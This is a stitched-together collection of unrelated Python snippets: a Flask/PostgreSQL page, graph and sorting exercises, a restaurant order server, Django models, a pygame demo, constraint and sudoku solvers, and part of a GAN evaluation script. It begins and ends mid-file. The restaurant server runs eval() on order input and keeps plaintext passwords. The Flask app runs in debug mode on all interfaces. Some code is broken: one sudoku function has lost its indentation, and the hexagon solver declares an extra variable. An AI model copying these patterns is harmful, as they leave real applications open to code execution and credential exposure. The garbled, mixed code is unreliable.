    conn = psycopg2.connect(au.connection_string)
    cur = conn.cursor()
    conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
    cur.execute(read_file())
except psycopg2.DatabaseError as e:
    print(f'Error {e}')
    sys.exit(1)
finally:
    if conn:
        conn.close()
def read_file():
    """Return the contents of the select-query SQL script.

    NOTE(review): intentionally redefines the earlier read_file(); from here
    on every caller reads *show_result* instead of *query*.
    """
    with open(show_result, 'r') as r1:
        return r1.read()
def get_data():
    """Run the select script; return (rows, False) on success or
    (error message, True) on a database error."""
    connection = None
    try:
        connection = psycopg2.connect(au.connection_string)
        cursor = connection.cursor()
        cursor.execute(read_file())
        return cursor.fetchall(), False
    except psycopg2.DatabaseError as exc:
        return f'Error {exc}', True
    finally:
        # close whether we succeeded or not; skip when connect() itself failed
        if connection:
            connection.close()
@app.route('/')
def index():
    """Render the results table, or the error page when the query failed."""
    result, failed = get_data()
    if failed:
        return render_template('output_error.html', error_fatal=failed)
    return render_template('index.html', tt1=t1, output1=result)
if __name__ == '__main__':
    # Binds on all interfaces, port 80; debug must be off in production.
    app.run(debug=True,host="0.0.0.0", port=80)
# Find cities at a given shortest distance - BFS problem, p339
# n cities, m roads, target distance k, start city x.
from collections import deque
n,m,k,x = map(int , input().split())
data = [[]for _ in range(n+1)]
for _ in range(m):
    a,b = map(int , input().split())
    data[a].append(b)
# distance[i] == -1 means city i has not been reached yet.
distance = [-1]*(n+1)
distance[x] = 0
# BFS: relax shortest distances level by level.
queue = deque([x])
while queue :
    now = queue.popleft()
    for next_node in data[now]:
        if distance[next_node] == -1:
            distance[next_node] = distance[now] +1
            queue.append(next_node)
# Print every city whose shortest distance is exactly k.
check = False
for i in range(1,n+1):
    if distance[i] == k:
        print(i)
        check = True
# When no city is at distance k, print -1.
if check == False:
    print(-1)
|
from django.conf.urls import url
from . import views
# Route "<slug>-<numeric id>/" URLs (e.g. "some-product-42/") to the
# product details view.
urlpatterns = [
    url(
        r"^(?P<slug>[a-z0-9-_]+?)-(?P<upload_id>[0-9]+)/$",
        views.product_details,
        name="details",
    )
]
|
# server functions
import datetime as dt
drinks=[]
d_cost=[]
food=[]
f_cost=[]
def order_menu():
    """Load the four menu lists (drinks/food names and costs) from menu.dat.

    SECURITY: eval() executes whatever the file contains; safe only while
    menu.dat is written exclusively by add_items()/rm_items().
    """
    global drinks,food,d_cost,f_cost
    with open ("menu.dat","r") as file:
        data=file.readlines()
    # one list literal per line: drinks, drink costs, food, food costs
    drinks = eval(data[0])
    d_cost = eval(data[1])
    food = eval(data[2])
    f_cost = eval(data[3])
def order():
    """Expose the in-memory menu as (drinks, drink costs, food, food costs)."""
    menu_snapshot = (drinks, d_cost, food, f_cost)
    return menu_snapshot
def ordering(cus_dets,ordered):
    """Record an order: price each item, total it and append it to orders.dat.

    :param cus_dets: customer details header prepended to the receipt
    :param ordered: string repr of the list of ordered item names
    SECURITY: eval() on *ordered* executes arbitrary input — replace with a
    safe parser such as ast.literal_eval.
    """
    ordered=eval(ordered)
    # receipt header: customer details plus a timestamp
    orders=cus_dets+f"\n{dt.datetime.now().strftime('%H:%M:%S / %Y-%m-%d')}"
    total=0
    for i in range (0,len(ordered)):
        # look the item up in the drinks list, then in the food list
        for k in range (0,len(drinks)):
            if (ordered[i]==drinks[k]):
                orders=orders+f"\n{drinks[k]}   {d_cost[k]} "
                total=total+int(d_cost[k])
        for k in range(0, len(food)):
            if (ordered[i]==food[k]):
                orders=orders+f"\n{food[k]}   {f_cost[k]}"
                total = total + int(f_cost[k])
    orders = orders + f"\nTotal ::   {total}"
    with open("orders.dat","a+") as file:
        file.seek(0)
        file.write("\n\n")
        file.write(orders)
def authenticate(auth):
    """Look up a "user::pass" prefix in usr.dat and return the matching line.

    Compares *auth* character by character against the start of each stored
    line. NOTE(review): both return statements sit inside the loop, so only
    the FIRST line of usr.dat is ever examined; and *match* is unbound
    (NameError) when the file is empty — confirm intended behaviour.
    """
    # Splitting data into lines
    auth=str(auth)
    with open("usr.dat", "r") as file:
        data = file.readlines()
    for line in data:
        det=str(line)
        # checking data in each line
        for i in range (0,len(auth)):
            if det[i]==auth[i]:
                match=True
            else :
                match=False
                break
        if match==True :
            return str(det)
        if match==False:
            return "Incorrect Username or Password"
def check(usr):
    """Return 'false' when the username already exists in usr.dat, else 'true'.

    Compares *usr* against the prefix of each stored line; a full prefix
    match followed by ':' means the name is taken. NOTE(review): the
    match==False early return means only the first non-matching line is
    considered, and *match* is unbound when the file is empty.
    """
    with open("usr.dat", "r") as file:
        data = file.readlines()
    for line in data:
        det = str(line)
        # checking data in each line
        for i in range(0, len(usr)):
            if det[i] == usr[i]:
                match = True
            else:
                match = False
                break
        if match == True and det[len(usr)]==':':
            return 'false'
        if match == False:
            return "true"
def new_acc(crd):
    """Append the new account credentials to usr.dat and report success."""
    with open("usr.dat", "a+") as store:
        store.seek(0)
        store.write(crd)
    return "True"
def edit(edit_det):
    """Replace a user's stored record in usr.dat with *edit_det*.

    Finds the current record via the "user::pass::" prefix of *edit_det*,
    then does a plain-text substitution across the whole file.
    """
    auth=us_pass(edit_det)
    current_det=authenticate(auth)
    fin = open("usr.dat", "rt")
    data = fin.read()
    data = data.replace(str(current_det), str(edit_det+'\n'))
    fin.close()
    fin = open("usr.dat", "wt")
    fin.write(data)  # overwrite the input file with the resulting data
    fin.close()
def us_pass(edit_det):
    """Extract "user::pass::" from a "user::pass::rest" details string.

    Scans for the first two '::' separators. NOTE(review): temp[i+1] can
    raise IndexError on a string with fewer than two separators, and uname/
    passwd are unbound when a separator is the very first token — the input
    is presumably always well-formed; confirm.
    """
    temp=edit_det
    for j in range (0,2):
        for i in range(0,len(temp)):
            if (temp[i]+temp[i+1]=='::'):
                temp=temp[i+2:]
                break
            else :
                if (j == 0):
                    uname=temp[0:i+1]
                elif(j == 1):
                    passwd = temp[0:i + 1]
    return (uname+'::'+passwd+'::')
def chng_pass(new_pass,curr_pass):
    """Swap *curr_pass* for *new_pass* inside usr.dat (plain-text replace)."""
    with open("usr.dat", "rt") as source:
        contents = source.read()
    contents = contents.replace(str(curr_pass), str(new_pass))
    # overwrite the input file with the resulting data
    with open("usr.dat", "wt") as target:
        target.write(contents)
def feedback(feed):
    """Append one feedback entry to feedback.dat on its own line."""
    with open("feedback.dat", "a+") as store:
        store.seek(0)
        store.write("\n")
        store.write(feed)
def s_orders():
    """Return all receipts from orders.dat, most recent order first.

    A receipt starts at a line containing "Username" and ends at a line
    containing "Total"; completed receipts are prepended to the history
    string so the newest appears first.
    """
    his=""
    temp=""
    # flag: 2 = outside a receipt, 1 = inside, 0 = receipt just completed
    flag=2
    with open ("orders.dat","r") as file:
        data=file.readlines()
    for line_read in data:
        if "Username" in line_read:
            flag=1
        elif "Total" in line_read :
            flag=0
        if len(line_read)!=0:
            temp = f"{temp} {line_read}"
        if flag == 0 :
            his=f"{temp}\n{his}"
            flag=2
            temp=""
    return his
def order_history(cus_dets):
    """Return the receipts in orders.dat belonging to customer *cus_dets*.

    Builds the history newest-first by prepending; lines between the
    customer-details marker and the "Total" line are included (except
    "Name ::" lines). Returns at most 2000 characters, or "No Orders".
    """
    flag=False
    his=''
    with open("orders.dat", "r") as file:
        data = file.readlines()
    for line in data:
        det=str(line)
        if cus_dets in det :
            # start of one of this customer's receipts
            flag = True
            his = '\n=================' + his
        elif 'Total' in det:
            his = f'\n{det}\n----------------'+his
            his = '\n\n=================' + his
            flag = False
        elif ( flag == True and cus_dets not in det):
            if("Name ::" not in det):
                his=f'\n{det}'+his
    if his=='':
        return "No Orders"
    else:
        return his[:2000]
def add(addr):
    """Join the entries of *addr*, newline-terminated, in reverse order."""
    lines = [entry + "\n" for entry in addr]
    return "".join(reversed(lines))
def add_items(o,n,c):
    """Add a menu item named *n* costing *c* to food or drinks (max 10 each).

    *o* selects the list ("New Food Item" or "New drinks"); when something
    was added the four menu lists are persisted back to menu.dat. The
    original left *flag* unbound (NameError) when neither branch matched;
    it is now initialised so unknown options are a no-op.
    """
    global drinks, food, d_cost, f_cost
    flag = 0
    if o == "New Food Item" and len(food) < 10:
        food.append(n)
        f_cost.append(c)
        flag = 1
    elif o == "New drinks" and len(drinks) < 10:
        drinks.append(n)
        d_cost.append(c)
        flag = 1
    if flag == 1:
        serialised = str(drinks) + "\n" + str(d_cost) + "\n" + str(food) + "\n" + str(f_cost)
        with open("menu.dat", "wt") as fout:
            fout.write(serialised)
def rm_items(item):
    """Remove menu item *item* (and its cost) from drinks or food, then persist.

    NOTE(review): d_cost.remove(d_cost[i]) / f_cost.remove(f_cost[i]) remove
    the FIRST occurrence of that cost value, which corrupts the name/cost
    pairing when two items share a price; the debug prints also look like
    leftovers.
    """
    global drinks,food,d_cost,f_cost
    for i in range (0,len(drinks)):
        print(drinks[i],i)
        if item==drinks[i]:
            drinks.remove(item)
            d_cost.remove(d_cost[i])
            break
    for i in range (0,len(food)):
        print(food[i],i)
        if item==food[i]:
            food.remove(item)
            f_cost.remove(f_cost[i])
            break
    # persist the four lists back to menu.dat
    temp=str(drinks)+"\n"+str(d_cost)+"\n"+str(food)+"\n"+str(f_cost)
    fout = open("menu.dat","wt")
    fout.write(temp)
    fout.close()
def read_feedback():
    """Return the full contents of feedback.dat."""
    with open("feedback.dat", "r") as source:
        collected = source.read()
    return collected
import uuid
from django.contrib.auth.models import AbstractUser
from django.core.urlresolvers import reverse
from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
class User(AbstractUser):
    """Standard Django user extended with an immutable API token."""
    # Random UUID issued once at creation; not editable afterwards.
    token = models.UUIDField(unique=True, default=uuid.uuid4, editable=False)
    def dictify(self):
        """Serialise the user (including their phones) for API responses."""
        return dict(
            name=self.get_full_name(),
            email=self.username,
            id=self.pk,
            created=self.date_joined,
            # by the API specification there is no way to modify the user
            modified=self.date_joined,
            token=self.token,
            last_login=self.last_login or self.date_joined,
            phones=[phone.dictify() for phone in self.phones.all()])
    def get_absolute_url(self):
        """Return the URL of this user's detail view."""
        return reverse('view-user', kwargs={'pk': self.pk})
class Phone(models.Model):
    """A phone number attached to a user."""
    user = models.ForeignKey(User, related_name='phones')
    number = PhoneNumberField()
    # Two-character code stored separately from the number — presumably the
    # Brazilian DDD area code; confirm against the API specification.
    ddd = models.CharField(max_length=2)
    def dictify(self):
        """Serialise this phone for API responses."""
        return dict(
            number=self.number.as_international,
            ddd=self.ddd)
    class Meta:
        # A user cannot register the same (ddd, number) pair twice.
        unique_together = (("user", "ddd", "number"),)
|
import pygame, sys # inicializando librerias
pygame.init() # initialise pygame
# DEFINE COLOURS
BLACK = (0,0,0)
WHITE = (255,255,255)
GREEN = (0,255,0)
RED = (255,0,0)
BLUE = (0,0,255)
size = (800, 500) # window size
# create the window
screen = pygame.display.set_mode(size)
# clock controlling the program's frame rate
clock = pygame.time.Clock()
# coordinates of the bouncing object
cord_x = 40
cord_y = 40
# velocity of the object
speed_x = 3
speed_y = 3
# main loop
while True:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            sys.exit() # QUIT
    #------------- GAME LOGIC -------------------
    # bounce off the window edges by reversing the velocity
    if(cord_x > 760 or cord_x < 40):
        speed_x *= -1
    if(cord_y > 460 or cord_y < 40):
        speed_y *= -1
    cord_x += speed_x
    cord_y += speed_y
    #---------- END OF GAME LOGIC -----------------------
    # clear the screen
    screen.fill(WHITE)
    ### ------- drawing zone
    #pygame.draw.line(screen, GREEN, [0,0],[0,800],5) # draw a line
    pygame.draw.lines(screen, RED, True, [(0,0),(800,0),(800,500),(0,500)],5)
    pygame.draw.circle(screen, BLUE, (cord_x,cord_y), 40)
    ##### -----------------
    # refresh the display
    pygame.display.flip()
    # set the clock to control the FRAMES PER SECOND
    clock.tick(1000)
|
import constraint
def o1(x,y,z):
    """Constraint: a 3-cell line of the magic hexagon must sum to 38."""
    return True if x + y + z == 38 else None
def o2(x,y,z,w):
    """Constraint: a 4-cell line of the magic hexagon must sum to 38."""
    return True if x + y + z + w == 38 else None
def o3(x,y,z,w,h):
    """Constraint: a 5-cell line of the magic hexagon must sum to 38."""
    return True if x + y + z + w + h == 38 else None
# Magic hexagon: 19 cells A..S, all different, every line summing to 38.
problem = constraint.Problem()
problem.addVariables("ABCDEFGHIJKLMNOPQRST", range(1,38))
problem.addConstraint(constraint.AllDifferentConstraint())
# Add a constraint for each horizontal line
#  A,B,C
# D,E,F,G
#H,I,J,K,L
# M,N,O,P
#  Q,R,S
problem.addConstraint(o1,"ABC")
problem.addConstraint(o2,"DEFG")
problem.addConstraint(o3,"HIJKL")
problem.addConstraint(o2,"MNOP")
problem.addConstraint(o1,"QRS")
# Add a constraint for each of the main diagonals
#  A,B,C
# D,E,F,G
#H,I,J,K,L
# M,N,O,P
#  Q,R,S
problem.addConstraint(o1,"HMQ")
problem.addConstraint(o2,"DINR")
problem.addConstraint(o3,"AEJOS")
problem.addConstraint(o2,"BFKP")
problem.addConstraint(o1,"CGL")
# Add a constraint for each of the anti-diagonals
#  A,B,C
# D,E,F,G
#H,I,J,K,L
# M,N,O,P
#  Q,R,S
problem.addConstraint(o1,"ADH")
problem.addConstraint(o2,"BEIM")
problem.addConstraint(o3,"CFJNQ")
problem.addConstraint(o2,"GKOR")
problem.addConstraint(o1,"LPS")
# Print every solution as a hexagon-shaped grid.
resenja = problem.getSolutions()
for r in resenja:
    print(" -----------------")
    print("   {0:d},{1:d},{2:d}".format(r['A'],r['B'],r['C']))
    print("  {0:d},{1:d},{2:d},{3:d}".format(r['D'],r['E'],r['F'],r['G']))
    print("{0:d},{1:d},{2:d},{3:d},{4:d}".format(r['H'],r['I'],r['J'],r['K'],r['L']))
    print("  {0:d},{1:d},{2:d},{3:d}".format(r['M'],r['N'],r['O'],r['P']))
    print("   {0:d},{1:d},{2:d}".format(r['Q'],r['R'],r['S']))
    print(" -----------------")
|
# 1. 삽입 정렬 (insertion sort)
# - 삽입 정렬은 ★두 번째 인덱스★부터 시작
# - 해당 인덱스(key 값) 앞에 있는 데이터(B)부터 비교해서
# key 값이 더 작으면 B값을 뒤 인덱스로 복사
# - 이를 key 값이 더 큰 데이터를 만날때까지 반복, 그리고 큰 데이터를 만난 위치
# 바로 뒤에 key 값을 이동
# 참고 : https://visualgo.net/en/sorting
# 이해 : https://goo.gl/XKBXuk
# # 2. 알고리즘 구현
# def insertion_sort(data):
# for index in range(len(data)-1):
# for index2 in range(index+1, 0, -1):
# if data[index2] < data[index2 - 1]:
# data[index2],data[index2 -1] = data[index2 - 1],data[index2]
# else:
# break
# return data
# import random
# data_list = random.sample(range(100), 10)
# print(insertion_sort(data_list))
# # 2-1
# rand_data_list = [3, 5, 1, 2]
# def insertion_sort2(data_list):
# for stand in range(len(data_list)-1):
# for num in range(stand+1, 0, -1):
# if data_list[num] < data_list[num-1]:
# data_list[num], data_list[num-1] = data_list[num-1], data_list[num]
# else:
# break
# return data_list
# print(insertion_sort2(rand_data_list))
# 3. 알고리즘 분석
# - 버블정렬과 동일하다.
|
# Print a right-aligned triangle of consecutive numbers, stopping at 10.
num = 1
for i in range(1, 6):  # controls the number of rows
    for j in range(1, 6 - i):  # print the leading blanks
        print(" ", end="")
    for j in range(1, i + 1):  # print the numbers
        print(num, end=" ")
        num += 1
        if num > 10:  # stop the sequence when it reaches 10
            break
    print()
|
#!/c/Python/python.exe
# -*-coding:utf-8 -*
from random import *
#prend une ligne aleatoire dans le fichier 'fichier'
#attention: la premiere ligne est une excepetion du fait du \n
def lire_fichier_sudoku(fichier,ligne):
    """Return the 81 characters of sudoku grid number *ligne* from *fichier*.

    Each grid occupies one 81-character line; grids after the first are
    offset by 82 characters to account for the newline.
    """
    with open(fichier,'r') as mon_fichier:
        texte=mon_fichier.read()
    nombres = list()
    if ligne==1:
        for i in range(81):
            nombres.append(texte[i])
    else:
        for i in range(82*(ligne-1),82*(ligne-1)+81):
            nombres.append(texte[i])
    return nombres
#saisir dans input la grille sudoku
def saisir_sudoku():
    """Prompt the user for the 81 digits of a sudoku grid.

    NOTE(review): returns int(n), which drops leading zeros and is an int
    where liste_to_grille() appears to expect an indexable sequence of 81
    characters — returning n itself looks intended; confirm. Returns None
    (after printing a hint) on non-numeric input.
    """
    try:
        n=input("veuillez mettre 81 chiffres ")
        nombres=int(n)
    except ValueError :  # not an int
        print("saisir des CHIFFRES entre 0 et 9...")
    else:
        if len(n)!=81:  # wrong number of characters
            raise Exception("pas le bon nombre de chiffres")
        else:
            return nombres
#transforme une liste de 81 int en une grille sudoku( liste de lsite de int )
def liste_to_grille(nombres):
    """Convert a flat sequence of 81 digit characters into a 9x9 int grid."""
    return [[int(nombres[9 * row + col]) for col in range(9)]
            for row in range(9)]
#print la grille comme demandé
def afficher_sudoku(grille):
    """Pretty-print the 9x9 grid with '|' and '-' separators around 3x3 boxes."""
    print("-------------")
    for ligne in range(9):
        for colonne in range(9):
            # print a '|' separator depending on the column position
            if colonne == 0:
                print("|"+str(grille[ligne][colonne]),end='')
            elif colonne in (2,5):
                print(str(grille[ligne][colonne])+"|",end='')
            elif colonne == 8:
                print(str(grille[ligne][colonne])+"|")
                # horizontal rule after rows 3, 6 and 9
                if ligne in(2,5,8):
                    print("-------------")
            else:
                print(str(grille[ligne][colonne]),end='')
#teste si une grille est valide, en parcourant toute la grille
#return un boolean (True si valide)
def est_valide(grille):
    """Return True when the 9x9 grid is a completed, valid sudoku."""
    res=True
    # a row fails if any digit 1-9 does not appear exactly once, or if it
    # still contains a 0 (empty cell)
    for ligne in range(9):
        for i in range(1,10):
            if grille[ligne].count(i) != 1 or grille[ligne].count(0) >0:
                res=False
    # same check per column; the column's digits are collected into temp
    temp=list()
    for colonne in range(9):
        for ligne in range(9):
            temp.append(grille[ligne][colonne])
        for i in range(1,10):
            if temp.count(i) != 1:
                res=False
        temp=[]
    # for the 3x3 boxes the loop bounds depend on which box is checked
    for zone in range(9):
        if(zone in(0,1,2)):
            limite_colonne=3*zone
            limite_ligne=0
        elif(zone in(3,4,5)):
            limite_colonne=3*(zone-3)
            limite_ligne=3
        else:
            limite_colonne=3*(zone-6)
            limite_ligne=6
        for ligne in range(limite_ligne,3+limite_ligne):
            for colonne in range(limite_colonne,3+limite_colonne):
                temp.append(grille[ligne][colonne])
        for i in range(1,10):
            if temp.count(i) != 1:
                res=False
        temp=[]
    return res
#definition qui chercher, pour une case donnée, dans quelle zone elle est
def quelle_zone(ligne,colonne):
    """Return the index (0-8, row-major) of the 3x3 box containing the cell.

    Arithmetic replaces the original nine-branch if/elif ladder; the result
    is identical for in-range coordinates (0 <= ligne, colonne <= 8).
    """
    return 3 * (ligne // 3) + colonne // 3
#M est un tableau 3D qui dit, pour chaque possibilité de numero dans une case,
#si on peut ou pas se mettre
def remplie_M(grille):
    """Build M[ligne][colonne][k]: 1 when digit k+1 is forbidden in that cell.

    A placed digit forbids itself along its row and column, forbids every
    digit in its own cell, and forbids itself across its 3x3 box.
    """
    M = [ [ [0 for i in range(9)] for j in range(9)] for k in range(9) ]
    for ligne in range(9):
        for colonne in range(9):
            k=grille[ligne][colonne]
            if k != 0:
                # first mark the row, the column and the cell itself
                for i in range(9):
                    M[ligne][i][k-1]=1
                    M[i][colonne][k-1]=1
                    M[ligne][colonne][i]=1
                # then mark the 3x3 box
                zone=quelle_zone(ligne,colonne)
                if(zone in(0,1,2)):
                    limite_colonne=3*zone
                    limite_ligne=0
                elif(zone in(3,4,5)):
                    limite_colonne=3*(zone-3)
                    limite_ligne=3
                else:
                    limite_colonne=3*(zone-6)
                    limite_ligne=6
                for li in range(limite_ligne,3+limite_ligne):
                    for co in range(limite_colonne,3+limite_colonne):
                        M[li][co][k-1]=1
    return M
# Simple constraint-propagation solver: whenever a cell has exactly one
# remaining candidate (per M), write it in; repeat until solved or stuck.
def remplie_grille(grille):
    """Fill *grille* in place with forced moves; return it (possibly unsolved)."""
    while not est_valide(grille):
        M = remplie_M(grille)
        progres = False
        for ligne in range(9):
            for colonne in range(9):
                candidats = M[ligne][colonne]
                if candidats.count(0) == 1:
                    grille[ligne][colonne] = candidats.index(0) + 1
                    progres = True
        # not solvable by forced moves alone: stop instead of looping forever
        if not progres:
            break
    return grille
# Cell-by-cell copy helper (list.copy() on a nested list would share rows).
#
# BUG FIX: the file defined copier() three times with different arities; in
# Python the last definition silently replaces the previous ones, so every
# existing call of copier(grille) or copier(grille, l) raised TypeError.
# The three variants are merged into one function with optional arguments,
# keeping all three call signatures working.
def copier(grille, l=None, c=None):
    """Copy a 9x9 grid cell by cell.

    copier(grille)       -> full deep copy of the grid
    copier(grille, l)    -> copy only row *l* (other cells stay placeholders)
    copier(grille, l, c) -> copy only cell (l, c)
    """
    # the `int` type object is the original "empty cell" placeholder
    res = [[int for i in range(9)] for j in range(9)]
    if l is None:
        for ligne in range(9):
            for colonne in range(9):
                res[ligne][colonne] = grille[ligne][colonne]
    elif c is None:
        for colonne in range(9):
            res[l][colonne] = grille[l][colonne]
    else:
        res[l][c] = grille[l][c]
    return res
# Test whether a grid can be finished with forced moves only.
# remplie_grille() mutates its argument, so the test runs on a copy.
def est_resolvable(a):
    """Return True when *a* is solvable by simple constraint propagation."""
    essai = copier(a)
    remplie_grille(essai)
    return est_valide(essai)
# Solver that also handles harder grids.
# The grid is scanned; wherever a cell has exactly two candidates the first
# one is tried and est_resolvable() tested; if that fails the grid is stored
# in a 'memory' list (copies) and the second candidate is tried instead,
# continuing from there.
#
# Once every cell has been tried, the method recurses on the next grid
# stored in the memory list, and so on.
#
# PROBLEM: this recursive solution is far too slow (several minutes); a
# non-recursive approach using real sudoku logic would be needed.
copies = list()  # memory of intermediate grids still to explore
res = [[]]       # the solved grid, shared through the recursion
def resoudre(grille, conteur):
    # conteur indexes into `copies`; it is incremented on every recursive call
    global res
    # a global is needed to carry the solved grid out of the recursion
    if not est_valide(grille):
        grille_copie = copier(grille)
        for ligne in range(9):
            for colonne in range(9):
                M = remplie_M(grille_copie)
                if M[ligne][colonne].count(0) == 2:
                    # try the first of the two candidates
                    chiffre = M[ligne][colonne].index(0) + 1
                    grille_copie[ligne][colonne] = chiffre
                    copies.append(copier(grille_copie))
                    if not est_resolvable(grille_copie):
                        # first guess fails: switch to the second candidate
                        chiffre = M[ligne][colonne].index(0, chiffre) + 1
                        grille_copie[ligne][colonne] = chiffre
                    if est_resolvable(grille_copie):
                        # the grid can now be finished with forced moves
                        remplie_grille(grille_copie)
                        res = copier(grille_copie)
                        return res
        conteur += 1
        resoudre(copies[conteur], conteur)
    return res
#prend une grille remplie en parametre et on enleve aléatoirement environ
# un quart des chiffre
def partielle(grille):
grille_copie=copier(grille)
for ligne in range(9):
for colonne in range(9):
r=int(random()*4)
if r==0:
grille_copie[ligne][colonne]=0
return grille_copie
if __name__ == "__main__":
    # ---------------------- interactive menu ----------------------
    menu = (
        "bonjour, que souhaitez vous? (tapez le numero correspondant)",
        "1/ Afficher une grille sudoku",
        "2/ Resoudre partiellement votre grille",
        "3/ Resoudre totalement votre grille",
        "4/ saisir une grille sudoku",
        "0/ Quitter",
    )
    for texte in menu:
        print(texte)
    choix = 'c'
    # `int` (the type object) is the empty-cell placeholder used elsewhere
    grille_principale = [[int for i in range(9)] for j in range(9)]
    grille_complete = [[int for i in range(9)] for j in range(9)]
    while choix != '0':
        choix = input(" :: ")
        if choix == '1':
            # pick one of the 245 grids stored in sudoku.txt at random
            numero = int(random() * 245 + 1)
            grille_principale = liste_to_grille(lire_fichier_sudoku('sudoku.txt', numero))
            print("grille numero: " + str(numero))
            afficher_sudoku(grille_principale)
            grille_complete = resoudre(grille_principale, -1)
        elif choix == '2':
            print("grille partielle : ")
            part = partielle(grille_complete)
            afficher_sudoku(part)
        elif choix == '3':
            print("grille_complete")
            afficher_sudoku(grille_complete)
        elif choix == '4':
            grille_principale = liste_to_grille(saisir_sudoku())
            grille_complete = resoudre(grille_principale, -1)
|
import pandas as pd
import json
import os.path

TEXT_EXTENSION = ".txt"
TRUTH_EXTENSION = ".truth"
PROBLEM_PREFIX = "problem-"
DIR = "../training_external/"
TEXT_AS_INDEX = "text"
POSITION_AS_INDEX = "positions"
ITERATIONS = 300000  # upper bound on problem ids; depends on the total number of files
FEATHER_FILE = "external_data_feather"

skeleton = {TEXT_AS_INDEX: [], POSITION_AS_INDEX: []}
# Collect one single-row frame per problem and concatenate once at the end.
# BUG FIX: the original grew the frame with DataFrame.append() in the loop,
# which is O(n^2) and was removed in pandas >= 2.0.
frames = [pd.DataFrame(skeleton)]
for file_id in range(1, ITERATIONS):
    TRAIN_FILE = DIR + PROBLEM_PREFIX + str(file_id) + TEXT_EXTENSION
    if os.path.isfile(TRAIN_FILE):
        TRUTH_FILE = DIR + PROBLEM_PREFIX + str(file_id) + TRUTH_EXTENSION
        # close the truth file deterministically (was json.load(open(...)))
        with open(TRUTH_FILE) as truth_file:
            temporary_file = json.load(truth_file)
        positions = ','.join(str(position) for position in temporary_file[POSITION_AS_INDEX])
        with open(TRAIN_FILE, 'r') as content_file:
            content = content_file.read()
        frames.append(pd.DataFrame({TEXT_AS_INDEX: [content], POSITION_AS_INDEX: [positions]}))
    if file_id % 10000 == 0:
        print(file_id)  # progress indicator
# default (non-ignoring) index concatenation matches the old append() result
data = pd.concat(frames)
data.reset_index().to_feather(FEATHER_FILE)
print("DONE")
|
import os
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torchvision import datasets
import torchvision.transforms as transforms
import torchvision.utils as vutils
import numpy as np
import matplotlib.pyplot as plt
from shutil import rmtree
import args
import util
from models import fcgan
from eval import fid_score
def set_random_seed(seed=23):
    """Seed every RNG in use (torch CPU/CUDA, numpy, stdlib) for reproducibility."""
    for seeder in (torch.manual_seed, torch.cuda.manual_seed_all,
                   np.random.seed, random.seed):
        seeder(seed)
    # cuDNN must also pick deterministic kernels and skip auto-tuning,
    # otherwise convolution results can still differ between runs
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
def main():
    """Evaluate a trained conditional FC-GAN.

    Modes (opt.eval_mode): "val"/"test" compute FID against that split;
    "nn" saves grids of generated samples next to their nearest training
    neighbours in pixel space.
    """
    #set_random_seed()
    # Change the following comments for CPU
    #device, gpu_ids = util.get_available_devices()
    device = torch.device('cpu')

    # Arguments
    opt = args.get_setup_args()
    num_classes = opt.num_classes
    # generator input = latent vector concatenated with a one-hot class label
    noise_dim = opt.latent_dim + opt.num_classes

    train_images_path = os.path.join(opt.data_path, "train")
    output_train_images_path = train_images_path + "_" + str(opt.img_size)
    output_sample_images_path = os.path.join(opt.output_path, opt.version, "sample_eval")
    output_nn_pixel_images_path = os.path.join(opt.output_path, opt.version, "nn_eval_pixel")
    output_nn_inception_images_path = os.path.join(opt.output_path, opt.version, "nn_eval_inception")
    os.makedirs(output_sample_images_path, exist_ok=True)
    os.makedirs(output_nn_pixel_images_path, exist_ok=True)
    #os.makedirs(output_nn_inception_images_path, exist_ok=True)

    def get_nn_pixels(sample_images, train_images):
        # For each sample, find the L2-nearest training image in pixel space.
        nn = [None]*len(sample_images)
        pdist = torch.nn.PairwiseDistance(p=2)
        N, C, H, W = train_images.shape
        for i in range(len(sample_images)):
            # broadcast the sample against every training image
            sample_image = sample_images[i].unsqueeze(0)
            sample_image = torch.cat(N*[sample_image])
            distances = pdist(sample_image.view(-1, C*H*W), train_images.view(-1, C*H*W))
            min_index = torch.argmin(distances)
            nn[i] = train_images[min_index]
        r = torch.stack(nn, dim=0).squeeze().to(device)
        return r

    def get_nn_inception(sample_activations, train_activations, train_images):
        # Same idea, but distances are computed between Inception activations.
        nn = [None]*len(sample_activations)
        pdist = torch.nn.PairwiseDistance(p=2)
        N = train_activations.size(0)
        for i in range(len(sample_activations)):
            sample_act = sample_activations[i].unsqueeze(0)
            sample_act = torch.cat(N*[sample_act])
            distances = pdist(sample_act, train_activations)
            min_index = torch.argmin(distances)
            nn[i] = train_images[min_index]
        r = torch.stack(nn, dim=0).squeeze().to(device)
        return r

    def get_nearest_neighbour_pixels(sample_images, num_images, train_images, train_labels):
        # Per class: stack the generated samples with their pixel-space
        # nearest neighbours (restricted to training images of that class).
        all_nn = []
        for i in range(num_classes):
            train_imgs = train_images[train_labels[:] == i]
            nearest_n = get_nn_pixels(sample_images[i*num_images:(i+1)*num_images], train_imgs)
            class_nn = torch.stack([sample_images[i*num_images:(i+1)*num_images], nearest_n], dim=0).squeeze().view(-1, 3, opt.img_size, opt.img_size).to(device)
            all_nn.append(class_nn)
            #r = torch.stack(nn, dim=0).squeeze().view(-1, 3, opt.img_size, opt.img_size).to(device)
            #print(r.shape)
        return all_nn

    def get_nearest_neighbour_inception(sample_images, num_images, train_images, train_labels):
        # Like the pixel variant, but neighbours are found in Inception
        # feature space (activations computed from images saved on disk).
        print("Getting sample activations...")
        sample_activations = fid_score.get_activations_given_path(output_sample_images_path, opt.batch_size, device)
        sample_activations = torch.from_numpy(sample_activations).type(torch.FloatTensor).to(device)
        print("Getting train activations...")
        train_activations = fid_score.get_activations_given_path(output_train_images_path, opt.batch_size, device)
        train_activations = torch.from_numpy(train_activations).type(torch.FloatTensor).to(device)
        all_nn = []
        for i in range(num_classes):
            train_imgs = train_images[train_labels[:] == i]
            train_act = train_activations[train_labels[:] == i]
            nearest_n = get_nn_inception(sample_activations[i*num_images:(i+1)*num_images], train_act, train_images)
            class_nn = torch.stack([sample_images[i*num_images:(i+1)*num_images], nearest_n], dim=0).squeeze().view(-1, 3, opt.img_size, opt.img_size).to(device)
            all_nn.append(class_nn)
            #r = torch.stack(nn, dim=0).squeeze().view(-1, 3, opt.img_size, opt.img_size).to(device)
            #print(r.shape)
        return all_nn

    def get_onehot_labels(num_images):
